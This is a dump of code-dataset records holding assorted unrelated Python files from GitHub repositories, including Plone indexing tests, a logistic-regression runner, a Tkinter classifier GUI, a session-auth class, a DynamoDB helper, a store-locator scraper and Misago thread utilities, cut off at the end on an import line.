1\n\t#schedule.every().day.at('22:03').do(run_threaded,test_job)\n\n#schedule_tasks()\nprint(os.getpid())\nschedule_tasks_test()\n#find_traffic(5, 69)\n#upload_file()\nwhile True:\n\tschedule.run_pending()\n\ttime.sleep(30)\n","repo_name":"buichlj/traffictracker","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35856809616","text":"# -*- coding: utf-8\nfrom unittest import defaultTestLoader\n\n# test-specific imports go here...\nfrom zope.component import queryUtility, getUtilitiesFor, provideUtility, getUtility\nfrom plone.registry.interfaces import IRegistry\nfrom Products.CMFCore.utils import getToolByName\nfrom collective.indexing.interfaces import IIndexQueueProcessor\nfrom Products.zerocms.interfaces import IZeroCMSIndexQueueProcessor, IRequestFactory, IZeroCMSSettings\n\nfrom mockito import *\nfrom transaction import commit\nfrom socket import error, timeout\nfrom time import sleep\n\nfrom layer import ZeroCMSTestCase\n\nfrom Products.zerocms.mapper import DataMapper, requiredAttributes \nfrom Products.zerocms.indexer import RequestFactory\nclass Bunch:\n def __init__(self, **kwds):\n self.__dict__.update(kwds)\n\nclass RequestFactoryTests(ZeroCMSTestCase):\n\n def afterSetUp(self):\n registry = getUtility(IRegistry)\n settings = registry.forInterface(IZeroCMSSettings, check=False)\n settings.post_url = u\"http://api/add\"\n def makeRequest(self):\n return mock()\n\n def test_save(self):\n factory = RequestFactory()\n request = mock()\n requestResponse = Bunch(status_code = 200, content=\"testContent\") \n when(request).post(any(), any()).thenReturn(requestResponse)\n factory.getRequests = lambda: request\n factory.save({'id' : 22})\n# verifyZeroInteractions(request)\n\n verify(request).post(u\"http://api/add\", '{\"id\": 22}')\n\n def test_delete(self):\n factory = RequestFactory()\n request = mock()\n requestResponse = Bunch(status_code = 200, content=\"testContent\") \n when(request).delete(any()).thenReturn(requestResponse)\n factory.getRequests = lambda: request\n\n factory.delete({'id' : 22})\n self.assertEqual(u\"http://api/22\", factory.delete_url)\n verify(request).delete(u\"http://api/22\")\n\nclass IndexingTests(ZeroCMSTestCase):\n\n def save(self, data):\n #print \"save(): data recived: \" + repr(data)\n self.savedData = data\n\n def afterSetUp(self):\n self.savedData = None\n self.folder.unmarkCreationFlag() # stop LinguaPlone from renaming\n self.factory = queryUtility(IRequestFactory)\n if self.factory is None:\n raise Exception(\"No factory created\")\n self.factory.save= self.save\n 
self.expData = '{\"locallyAllowedTypes\": [], \"description\": \"\", \"language\": \"en\", \"title\": \"Foo\", \"rights\": \"\", \"id\": \"test_user_1_\", \"contributors\": [], \"immediatelyAddableTypes\": [], \"creators\": [], \"constrainTypesMode\": -1, \"subject\": []}'\n\n registry = getUtility(IRegistry)\n self.config = registry.forInterface(IZeroCMSSettings, check=False)\n self.config.instance_id = u\"test_\"\n self.config.instance_url= u\"http://test.com\"\n\n def beforeTearDown(self):\n pass\n\n\n\n def testIndexObjectFails(self):\n def raiseException( val):\n raise Exception(\"no save today\")\n self.factory.save = raiseException\n self.folder.processForm(values={'title': 'Foo'}) # updating sends\n self.assertEquals(self.folder.Title(), 'Foo')\n \n self.assertRaises(Exception, commit)\n\n def testDeleteObject(self):\n self.folder.processForm(values={'url': 'Boo'}) # sends remove and index\n\n\n def testIndexObject(self):\n self.folder.processForm(values={'title': 'Foo'}) # updating sends\n self.assertEquals(self.folder.Title(), 'Foo')\n commit() # indexing happens on commit\n self.assertEqual(self.folder.Title(), 'Foo')\n self.assertTrue(self.savedData is not None)\n # 37 UUID + 5 instance_id\n self.assertEquals(len(self.savedData['id']) ,42,msg=\"ID: %s - len %d\" % (self.savedData['id'], len(self.savedData['id'])))\n self.assertEquals(self.savedData['url'] , \"http://test.com/plone/Members/test_user_1_\")\n\n for item in requiredAttributes:\n self.assertTrue(item in self.savedData, msg=\"Missing %s in saved data\" % item)\n\n self.assertNotEquals(self.savedData['body'], \"\")\n self.assertEquals(self.savedData['type'], \"ATFolder\")\n\n def _test_callIndexing(self):\n indexProcessor = queryUtility(IZeroCMSIndexQueueProcessor, name=\"zerocms\")\n indexProcessor.index(self.folder, attributes = {'url' : 'test'})\n\n self.assertEquals(len(self.savedData['id']) ,36)\n\n def _testNoIndexingWithMethodOverride(self):\n self.setRoles(['Manager'])\n output = []\n connection = self.proc.getConnection()\n responses = [getData('dummy_response.txt')] * 42\n output = fakehttp(connection, *responses)\n self.folder.invokeFactory('Topic', id='coll', title='a collection')\n self.folder.coll.addCriterion('Type', 'ATPortalTypeCriterion')\n self.assertTrue('crit__Type_ATPortalTypeCriterion' not in str(output))\n commit()\n self.assert_(repr(output).find('a collection') > 0,\n '\"title\" data not found')\n self.assert_(repr(output).find('crit') == -1, 'criterion indexed?')\n objs = self.portal.portal_catalog(portal_type='ATPortalTypeCriterion')\n self.assertEqual(list(objs), [])\n self.folder.manage_delObjects('coll')\n\n def _testNoIndexingForNonCatalogAwareContent(self):\n self.setRoles(['Manager'])\n output = []\n ref = self.folder.addReference(self.portal.news, 'referencing')\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n self.assertTrue(self.savedData is None)\n\nclass UtilityTests(ZeroCMSTestCase):\n\n def testGenericInterface(self):\n proc = queryUtility(IIndexQueueProcessor, name='zerocms')\n self.failUnless(proc, 'utility not found')\n self.failUnless(IIndexQueueProcessor.providedBy(proc))\n self.failUnless(IZeroCMSIndexQueueProcessor.providedBy(proc))\n\n def testGetRequestFactory(self):\n proc = queryUtility(IRequestFactory)\n self.failUnless(proc, 'request factory utility not found')\n\n def testSolrInterface(self):\n proc = queryUtility(IZeroCMSIndexQueueProcessor, name='zerocms')\n self.failUnless(proc, 'utility not found')\n 
self.failUnless(IIndexQueueProcessor.providedBy(proc))\n self.failUnless(IZeroCMSIndexQueueProcessor.providedBy(proc))\n\n def testRegisteredProcessors(self):\n procs = list(getUtilitiesFor(IIndexQueueProcessor))\n self.failUnless(procs, 'no utilities found')\n zerocms = queryUtility(IZeroCMSIndexQueueProcessor, name='zerocms')\n self.failUnless(zerocms in [util for name, util in procs],\n 'zerocms utility not found')\n\n# def testSearchInterface(self):\n# search = queryUtility(ISearch)\n# self.failUnless(search, 'search utility not found')\n# self.failUnless(ISearch.providedBy(search))\n\n\ndef test_suite():\n return defaultTestLoader.loadTestsFromName(__name__)\n #return defaultTestLoader.loadTestsFromTestCase(UtilityTests)\n","repo_name":"zeronorge/Products.zerocms","sub_path":"Products/zerocms/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21717561673","text":"from logistic_reg import *\n\ndef testDataLoad():\n print(\"Running \" + testDataLoad.__name__)\n X = dataLoad(\"data_banknote_authentication.txt\")\n print(X.shape)\n\ndef testNormalization():\n print(\"Running \" + testNormalization.__name__)\n X = dataLoad(\"data_banknote_authentication.txt\")\n X_norm = dataNorm(X)\n testNorm([X_norm])\n\ndef testErrorCompute():\n print(\"Running \" + testErrorCompute.__name__)\n X = dataLoad(\"data_banknote_authentication.txt\")\n X_norm = dataNorm(X)\n J = errCompute(X_norm, np.zeros((X_norm.shape[1] - 1, 1)))\n print(J)\n\ndef testSGD():\n print(\"Running \" + testSGD.__name__)\n X = dataLoad(\"a4shuffled.data\")\n X_shufnorm = dataNorm(X)\n theta = stochasticGD(X_shufnorm, np.zeros((X_shufnorm.shape[1] - 1, 1)), 0.01, 1372 * 20)\n J = errCompute(X_shufnorm, theta)\n print(\"Error : {}\".format(J))\n\ndef testSGDPredict():\n print(\"Running \" + testSGDPredict.__name__)\n print(\"Train set : a4shuffled.data\")\n X = dataLoad(\"a4shuffled.data\")\n X_shufnorm = dataNorm(X)\n theta = stochasticGD(X_shufnorm, np.zeros((X_shufnorm.shape[1] - 1, 1)), 0.01, 1372 * 20)\n J = errCompute(X_shufnorm, theta)\n print(\"Error : {}\".format(J))\n\n print(\"Test set : a4shuffled.data\")\n y_predict = Predict(X_shufnorm, theta)\n\n test_predict = []\n count = 0\n\n dataFile = open(\"a4predict.data\", \"r\")\n lines = dataFile.readlines()\n\n for line in lines:\n words = line.split(\",\")\n for word in words:\n test_predict.append(int(word))\n \n hit = 0\n for i in range(len(test_predict)):\n if test_predict[i] == y_predict[i]:\n hit += 1\n accuracy = hit / len(test_predict) * 100.0\n print(\"Accuracy : {}\".format(accuracy))\n\ndef testSGDPredict2():\n print(\"Running \" + testSGDPredict2.__name__)\n print(\"Train set : a4shuffled.data\")\n X = dataLoad(\"a4shuffled.data\")\n X_shufnorm = dataNorm(X)\n theta = stochasticGD(X_shufnorm, np.zeros((X_shufnorm.shape[1] - 1, 1)), 0.01, 1372 * 20)\n J = errCompute(X_shufnorm, theta)\n print(\"Error : {}\".format(J))\n \n X_test = dataLoad(\"data_banknote_authentication.txt\")\n X_testnorm = dataNorm(X_test)\n\n print(\"Test set : data_banknote_authentication.txt\")\n y_predict = Predict(X_testnorm, theta)\n\n hit = 0\n for i in range(X_testnorm.shape[0]):\n if X_testnorm[i][-1] == y_predict[i]:\n hit += 1\n accuracy = hit / X_testnorm.shape[0] * 100.0\n print(\"Accuracy : 
{}\".format(accuracy))\n\ntestDataLoad()\ntestNormalization()\ntestErrorCompute()\ntestSGD()\ntestSGDPredict()\ntestSGDPredict2()","repo_name":"wenlin-koh/Logistic-Regression-Classifier---python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32198557562","text":"import sys\nfrom pathlib import Path\n\nimport cloudpickle\n\n\ndef main(uid, input_file):\n func_path = Path.cwd() / f'{uid}.func'\n with func_path.open(mode = 'rb') as f:\n func = cloudpickle.load(f)\n\n input_file_path = Path.cwd() / Path(input_file).name\n output_file_path = Path.cwd() / f'{uid}.output'\n\n func(input_file_path, output_file_path)\n\n\nif __name__ == '__main__':\n main(uid = sys.argv[1], input_file = sys.argv[2])\n","repo_name":"JoshKarpel/htcondor-job","sub_path":"htcondor_job/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32073636652","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 17 00:58:53 2018\r\n\r\n@author: Lior Reznik\r\n\"\"\"\r\n\r\nfrom Tkinter import *\r\nimport tkFileDialog\r\nimport tkMessageBox \r\n\r\n\r\nclass View:\r\n def __init__(self, main,controller):\r\n self.controller=controller\r\n self.main=main\r\n self.__build\r\n\r\n @property \r\n def __build(self):\r\n \"\"\"function that builds the gui\"\"\"\r\n self.prevmsg=\"\"\r\n self.main.geometry(\"750x450+950+187\")\r\n self.main.title(\"Naive Bayes Classifier\")\r\n self.main.configure(background=\"#ffffff\")\r\n self.Browse_Button = Button(self.main,background='#d9d9d9',activebackground=\"#d9d9d9\",activeforeground=\"#000000\")\r\n self.Browse_Button.place(relx=0.81, rely=0.24, height=34, width=130)\r\n self.Browse_Button.configure(text=\"Browse\",command=self.__findpath)\r\n\r\n self.Build_Button = Button(self.main,state='disabled',background='#d9d9d9',activebackground=\"#d9d9d9\",activeforeground=\"#000000\")\r\n self.Build_Button.place(relx=0.23, rely=0.49, height=34, width=247)\r\n self.Build_Button.configure(text=\"Build\",command=self.controller.builder)\r\n \r\n\r\n self.Browse_Entry = Entry(self.main,state='readonly',background=\"white\",font=\"TkFixedFont\",insertbackground=\"black\",readonlybackground=\"white\",width=254,text='Click on Browse to select the folder path',)\r\n self.Browse_Entry.place(relx=0.26, rely=0.24,height=30, relwidth=0.54)\r\n \r\n \r\n self.Classify_Button=Button(self.main,state='disabled',background='#d9d9d9',activebackground=\"#d9d9d9\",activeforeground=\"#000000\")\r\n self.Classify_Button.place(relx=0.23, rely=0.6, height=34, width=247)\r\n self.Classify_Button.configure(text=\"Classify\",command=self.controller.classify)\r\n\r\n self.Path_Label = Label(self.main,background=\"#ffffff\",foreground=\"#000000\",text=\"Directory path\")\r\n self.Path_Label.place(relx=0.03, rely=0.24, height=31, width=104)\r\n \r\n\r\n self.Bins_Label = Label(self.main,background=\"#ffffff\",foreground=\"#000000\",text=\"Discretiztion Bins\")\r\n self.Bins_Label.place(relx=0.03, rely=0.33, height=21, width=96)\r\n \r\n self.Bins_Entry = Entry(self.main,background=\"white\",font=\"TkFixedFont\",insertbackground=\"black\",readonlybackground=\"white\",state='readonly')\r\n self.Bins_Entry.place(relx=0.26, rely=0.32,height=30, relwidth=0.14,width=154)\r\n \r\n self.InfoLabel = Label(self.main,background=\"white\",text=\"\")\r\n 
self.InfoLabel.place(relx=0.26, rely=0.90, height=21, width=400)\r\n self.InfoLabel2 =Label(self.main,background=\"white\",text=\"\")\r\n self.InfoLabel2.place(relx=0.26, rely=0.95, height=21, width=400)\r\n \r\n def __findpath(self):\r\n \"\"\"function to ask the path from the user\"\"\"\r\n self.path=tkFileDialog.askdirectory(parent=self.main,title='Please select a directory')\r\n #if the user heats the cancule batuoon the we will exit the program\r\n if not self.path:\r\n tkMessageBox.showinfo('','Exiting...')\r\n self.main.destroy()\r\n self.Browse_Entry.configure(state='normal')\r\n self.Browse_Entry.delete(0, END)\r\n self.Browse_Entry.insert(0, self.path)\r\n self.Browse_Entry.configure(state='readonly')\r\n #sending the path to check in the controller (to find out if the path contains all the files we need)\r\n self.controller.check_path(self.path)\r\n \r\n \r\n def update(self,msg):\r\n \"\"\"function to show a messagebox with the desiered massage that comes from the controller\"\"\"\r\n tkMessageBox.showinfo(\"\",msg)\r\n\r\n def show_updates(self,prevmsg,msg):\r\n \"\"\"function to show updates on the frame\"\"\"\r\n self.InfoLabel.configure(text=prevmsg)\r\n self.InfoLabel2.configure(text=msg)\r\n \r\n \r\n \r\n \r\n def file_error_handling(self,titlemsg,msg):\r\n tkMessageBox.showerror(titlemsg,msg)\r\n ans=tkMessageBox.askyesno(message='Do you want to try again?')\r\n if not ans:\r\n tkMessageBox.showinfo('','Exiting...')\r\n self.main.destroy()\r\n self.__findpath()\r\n\r\n \r\n\r\n\r\n \r\n","repo_name":"LiorReznik/NaiveBayesClassifier","sub_path":"View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22674249600","text":"import cv2\n\nprint(\"Amogus\")\n\nimageName = cv2.imread(\"images\\\\meeeee.jpg\", 1)\n\nimageResize = cv2.resize(imageName,(200,350))\ncv2.imshow(\"Me have become resize\", imageResize)\ncv2.imshow(\"Hrello dis me\", imageName)\ncv2.waitKey(0)\n\n\n\n\n\n\n","repo_name":"mafl20/p3","sub_path":"Scripts/martinTestTingTing.py","file_name":"martinTestTingTing.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12503526285","text":"import random, time\nfrom typing import Callable\n\ndef test_search_func(size_of_sample_set: int, search_func: Callable):\n x, y = -size_of_sample_set, size_of_sample_set\n sample_list = random.sample(range(x, y), size_of_sample_set)\n sample_list.sort()\n search_elem = random.choice(sample_list)\n \n start_time = time.time()\n i = search_func(*(search_elem, sample_list))\n print(\"took %s\" % (time.time() - start_time))\n\n assert search_elem == sample_list[i]\n\n print(f\"Found {sample_list[i]} on index {i} in list: {sample_list[:10]}.. 
(searched for: {search_elem})\")\n\ndef test_search_func_not_found(search_func: Callable):\n sample_list = random.sample(range(0, 100), 15)\n sample_list.sort()\n search_elem = 120\n\n start_time = time.time()\n assert search_func(*(search_elem, sample_list)) == -1\n print(\"took %s\" % (time.time() - start_time))\n print(f\"Did not found {search_elem} in list: {sample_list[:10]}..\")\n\ndef test_min_max_search(size_of_sample_set: int, min_max_search_func: Callable):\n x, y = -size_of_sample_set, size_of_sample_set\n sample_list = random.sample(range(x, y), size_of_sample_set)\n expected_min, expected_max = min(sample_list), max(sample_list)\n\n start_time = time.time()\n actual_min, actual_max = min_max_search_func(sample_list)\n print(\"took %s\" % (time.time() - start_time))\n\n assert (expected_min, expected_max) == (actual_min, actual_max)\n\n print(f\"Found min/max {actual_min}/{actual_max} in {sample_list[:10]}...\")","repo_name":"PXZ1337/search-algorithms","sub_path":"src/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43818846460","text":"#!/usr/bin/env python3\n\"\"\"\nModule session_auth\n\"\"\"\nfrom api.v1.auth.auth import Auth\nimport uuid\nfrom models.user import User\n\n\nclass SessionAuth(Auth):\n \"\"\"Class for session authentication\"\"\"\n user_id_by_session_id = {}\n\n def create_session(self, user_id: str = None) -> str:\n \"\"\"creates a Session ID for a user_id\"\"\"\n if user_id is None or isinstance(user_id, str) is False:\n return None\n session_id = str(uuid.uuid4())\n self.user_id_by_session_id[session_id] = user_id\n\n return session_id\n\n def user_id_for_session_id(self, session_id: str = None) -> str:\n \"\"\"returns a User ID based on a Session ID\"\"\"\n if session_id is None or isinstance(session_id, str) is False:\n return None\n return self.user_id_by_session_id.get(session_id)\n\n def current_user(self, request=None):\n \"\"\"returns a User instance based on a cookie value\n cookie value is the session id\"\"\"\n cookie_value = self.session_cookie(request)\n user_id = self.user_id_for_session_id(cookie_value)\n return User.get(user_id)\n\n def destroy_session(self, request=None):\n \"\"\"deletes the user session / logout\"\"\"\n if request is None:\n return False\n cookie_value = self.session_cookie(request)\n if cookie_value is None or self.user_id_for_session_id(\n cookie_value) is None:\n return False\n del self.user_id_by_session_id[cookie_value]\n return True\n","repo_name":"Robid-Phantom007/alx-backend-user-data","sub_path":"0x02-Session_authentication/api/v1/auth/session_auth.py","file_name":"session_auth.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6053947317","text":"from .base_item import BaseItem\n\n\nclass Paragraph(BaseItem):\n def __init__(self, text, x1, y1, x2, y2, lang, text_lines=None):\n super().__init__(text, x1, y1, x2, y2)\n self.text = ' '.join(text)\n self.lang = lang\n self.text_lines = text_lines\n\n def compute_coordinates(self, x1, y1, x2, y2):\n x1 = min(x1)\n y1 = min(y1)\n\n x2 = max(x2)\n y2 = max(y2)\n return x1, y1, x2, y2","repo_name":"robertgargalac/tuatara","sub_path":"ocr/app/items/paragraph.py","file_name":"paragraph.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"19759976138","text":"#!/usr/bin/python3\n\nimport collections\nimport re\nimport secrets\n\n\nclass Node(collections.UserDict):\n\n def __init__(self):\n self.data = dict()\n self.key = secrets.token_bytes(8)\n\n def __hash__(self):\n return hash(self.key)\n\n\ndef dfs_visit(node, visited=set()):\n visited.add(node)\n for n in node:\n if n not in visited:\n dfs_visit(n, visited)\n return visited\n\n\ndef dfs_count(node, visited=dict()):\n if node in visited:\n return visited[node]\n if len(node) == 0:\n visited[node] = 1\n return 1\n counts = sum(d * dfs_count(n, visited) for n, d in node.items()) + 1\n visited[node] = counts\n return counts\n\n\ndef main():\n with open(\"input/07.txt\") as f:\n lines = [l.strip().split(' contain ') for l in f.readlines()]\n graph1 = collections.defaultdict(Node)\n graph2 = collections.defaultdict(Node)\n for outer, inners in lines:\n outer = outer[:-5]\n inners = re.findall(r'(\\d+) (\\b.*?\\b \\b.*?\\b) bags?[,.]', inners)\n for n, c in inners:\n graph1[c][graph1[outer]] = int(n)\n graph2[outer][graph2[c]] = int(n)\n print(len(dfs_visit(graph1['shiny gold'])) - 1)\n print(dfs_count(graph2['shiny gold']) - 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vulpicastor/advent-of-code-2020","sub_path":"src/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39696951487","text":"import scrapy\nimport json\nimport os\nfrom scrapy.spiders import Spider\nfrom scrapy.http import FormRequest\nfrom scrapy.http import Request\nfrom chainxy.items import ChainItem\nfrom lxml import etree\nfrom selenium import webdriver\nfrom lxml import html\n\nclass bostonpizza(scrapy.Spider):\n\tname = 'bostonpizza'\n\tdomain = 'https://www.bostonpizza.com/'\n\thistory = ['']\n\n\tdef __init__(self):\n\t\tscript_dir = os.path.dirname(__file__)\n\t\tfile_path = script_dir + '/geo/cities.json'\n\t\twith open(file_path) as data_file: \n\t\t\tlocation_list = json.load(data_file)\n\n\tdef start_requests(self):\n\t\tinit_url = 'https://bostonpizza.com/json/stores-en.json'\n\t\tyield scrapy.Request(url=init_url, callback=self.body) \n\n\tdef body(self, response):\n\t\tprint(\"========= Checking.......\")\n\t\t\n\t\tstore_list = json.loads(response.body)\n\t\tfor store in store_list:\n\t\t\titem = ChainItem()\n\t\t\titem['store_name'] = store['name']\n\t\t\titem['store_number'] = store['id']\n\t\t\titem['address'] = store['address']['address']\n\t\t\titem['address2'] = ''\n\t\t\titem['city'] = store['address']['city']\n\t\t\titem['state'] = store['address']['province']\n\t\t\titem['zip_code'] = store['address']['postal_code']\n\t\t\titem['country'] = store['address']['country']\n\t\t\titem['phone_number'] = store['contact']['store']\n\t\t\titem['latitude'] = store['coordinates']['latitude']\n\t\t\titem['longitude'] = store['coordinates']['longitude']\n\t\t\th_temp = ''\n\t\t\thour_list = store['hours']\n\t\t\tfor hour in hour_list:\n\t\t\t\th_temp += hour + ', '\n\t\t\titem['store_hours'] = h_temp[:-2]\n\t\t\titem['store_type'] = ''\n\t\t\titem['other_fields'] = ''\n\t\t\titem['coming_soon'] = ''\n\t\t\tyield item\t\t\n\n\tdef validate(self, item):\n\t\ttry:\n\t\t\treturn item.strip()\n\t\texcept:\n\t\t\treturn 
''","repo_name":"coralisland-git/Alscrapy-store-locations","sub_path":"91800(BS2)/28-bostonpizza/chainxy/spiders/bostonpizza.py","file_name":"bostonpizza.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"16352776413","text":"class Solution:\n def print_n_num(self, n):\n if n < 1:\n return\n\n max_n_num = 1\n for i in range(n):\n max_n_num *= 10\n\n for num in range(1, max_n_num):\n print(num)\n\nif __name__ == '__main__':\n S = Solution()\n S.print_n_num(2)\n\n\n\n\n","repo_name":"MemoryForSky/Data-Structures-and-Algorithms","sub_path":"my_target_offer/17_print_1_to_max_n_num.py","file_name":"17_print_1_to_max_n_num.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27674171432","text":"def solution(name):\n alphabet=list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n arr = []\n\n for j in name:\n for index, i in enumerate(alphabet):\n if i == j:\n print(j, i)\n arr.append(index)\n cur = 0\n count = 0\n while arr:\n char = arr[0]\n \n print('----------------', '[0]',arr[0],'cur',cur)\n #오른쪽\n if abs(char - cur) > abs(len(alphabet) - char):\n count += abs(len(alphabet) - char)\n print('>', 'plus', abs(len(alphabet) - char), 'count', count)\n #왼쪽\n elif abs(char - cur) > char + 1:\n count += char + 1\n print('<', 'plus', char + 1, 'count', count)\n else:\n count += abs(char - cur) \n print('^', 'plus', abs(char - cur), 'count', count)\n\n cur = arr[0]\n arr.pop(0)\n print(' ')\n return count\n\nprint(solution('SAAAAAARRM'))","repo_name":"Lee-ji-soo/algorithm","sub_path":"그리디/조이스틱1.py","file_name":"조이스틱1.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20299060303","text":"\nimport requests\nfrom bs4 import BeautifulSoup\nYOUTUBE_TRENDING_URL = 'https://www.youtube.com/feed/trending'\n\n# não executa JS\nresponse = requests.get(YOUTUBE_TRENDING_URL)\n\nprint('status code', response.status_code)\n\ndoc = BeautifulSoup(response.text,'html.parser')\nprint(doc.title.Text)\n\n#find all video divs\nvideo_divs = doc.find_all('div', class_='style-scope ytd-video-renderer')\nprint(f'found {len(video_divs)} videos')","repo_name":"FernandesDavi/selenium-web-scraper","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7848860672","text":"\nimport os\nimport boto3\n\nAWS_ACCESS_KEY_ID = os.environ[\"AWS_ACCESS_KEY_ID\"]\nAWS_SECRET_ACCESS_KEY = os.environ[\"AWS_SECRET_ACCESS_KEY\"]\nREGION_NAME='us-west-1'\n\nREAD_CAPACITY_DEFAULT = 5\nWRITE_CAPACITY_DEFAULT = 5\n\nclass database:\n\n @staticmethod\n def admin_session():\n session = boto3.Session(\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n )\n\n return session\n\n @staticmethod\n def dynambo_admin_session():\n session = database.admin_session()\n dynamodb = session.resource('dynamodb', region_name=REGION_NAME)\n\n return dynamodb\n \n @staticmethod\n def dynambo_admin_client():\n session = database.admin_session()\n dynamodb = boto3.client('dynamodb', region_name=REGION_NAME)\n\n return dynamodb\n\n @staticmethod\n def create_table(tablename, key_var, range_var, attributes):\n\n dynamodb = database.dynambo_admin_session()\n\n if range_var is not None:\n keySchema = [\n 
{\n 'AttributeName': key_var,\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': range_var,\n 'KeyType': 'RANGE'\n },\n ]\n else:\n keySchema = [{'AttributeName': key_var, 'KeyType': 'HASH'}]\n\n attributeDefinitions = []\n for key, value in attributes.items():\n attribute = {}\n attribute[\"AttributeName\"] = key\n attribute[\"AttributeType\"] = value\n attributeDefinitions.append(attribute)\n \n print(keySchema, attributeDefinitions)\n \n provisionedThroughput={\n 'ReadCapacityUnits': READ_CAPACITY_DEFAULT,\n 'WriteCapacityUnits': WRITE_CAPACITY_DEFAULT,\n }\n\n table = dynamodb.create_table(\n TableName=tablename,\n KeySchema=keySchema,\n AttributeDefinitions=attributeDefinitions,\n ProvisionedThroughput=provisionedThroughput\n )\n\n print(table)\n\n table.meta.client.get_waiter('table_exists').wait(TableName=tablename)\n\n @staticmethod\n def clear_table(tablename, key_var, range_var):\n dynamodb = database.dynambo_admin_session()\n table = dynamodb.Table(tablename)\n result = table.scan()\n\n\t # result = json.loads(result[\"Items\"])\n with table.batch_writer() as batch:\n for obj in result[\"Items\"]:\n batch.delete_item(Key={\n key_var: obj[\"product_name\"],\n range_var: obj[\"brand_name\"]\n })\n\n print(tablename, \"cleared\")\n \n @staticmethod\n def add_table_entry(tablename, item):\n dynamodb = database.dynambo_admin_session()\n table = dynamodb.Table(tablename)\n table.put_item(Item=item)\n\n @staticmethod\n def add_table_batch(tablename, items):\n dynamodb = database.dynambo_admin_session()\n table = dynamodb.Table(tablename)\n with table.batch_writer() as batch:\n for item in items:\n batch.put_item(Item=item)\n\n# add config to environment variables\n\n ","repo_name":"af13s/curlbot","sub_path":"database/database_accessor.py","file_name":"database_accessor.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39936103244","text":"from django.core.urlresolvers import resolve\nfrom django.utils import six\nfrom django.utils.six.moves.urllib.parse import urlparse\n\n\ndef add_categories_to_threads(root_category, categories, threads):\n categories_dict = {}\n for category in categories:\n categories_dict[category.pk] = category\n\n top_categories_map = {}\n\n for thread in threads:\n thread.top_category = None\n thread.category = categories_dict[thread.category_id]\n\n if thread.category == root_category:\n continue\n elif thread.category.parent_id == root_category.pk:\n thread.top_category = thread.category\n elif thread.category_id in top_categories_map:\n thread.top_category = top_categories_map[thread.category_id]\n elif root_category.has_child(thread.category):\n # thread in subcategory resolution\n for category in categories:\n if (category.parent_id == root_category.pk and\n category.has_child(thread.category)):\n top_categories_map[thread.category_id] = category\n thread.top_category = category\n else:\n # global thread in other category resolution\n for category in categories:\n if category.level == 1 and (\n category == thread.category or\n category.has_child(thread.category)):\n top_categories_map[thread.category_id] = category\n thread.top_category = category\n\n\nSUPPORTED_THREAD_ROUTES = {\n 'misago:thread': 'pk',\n 'misago:thread-post': 'pk',\n 'misago:thread-last': 'pk',\n 'misago:thread-new': 'pk',\n 'misago:thread-unapproved': 'pk',\n}\n\n\ndef get_thread_id_from_url(request, url):\n try:\n clean_url = six.text_type(url).strip()\n bits = urlparse(clean_url)\n 
except:\n return None\n\n if bits.netloc and bits.netloc != request.get_host():\n return None\n\n if bits.path.startswith(request.get_host()):\n clean_path = bits.path.lstrip(request.get_host())\n else:\n clean_path = bits.path\n\n try:\n wsgi_alias = request.path[:len(request.path_info) * -1]\n resolution = resolve(clean_path[len(wsgi_alias):])\n except:\n return None\n\n if not resolution.namespaces:\n return None\n\n url_name = '{}:{}'.format(':'.join(resolution.namespaces), resolution.url_name)\n kwargname = SUPPORTED_THREAD_ROUTES.get(url_name)\n\n if not kwargname:\n return None\n\n try:\n return int(resolution.kwargs.get(kwargname))\n except (TypeError, ValueError):\n return None\n","repo_name":"sonnyESP24/EFCGSM","sub_path":"backend/misago/threads/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26010460231","text":"from digit_reg import train_main, infer_main\nfrom http.server import HTTPServer, 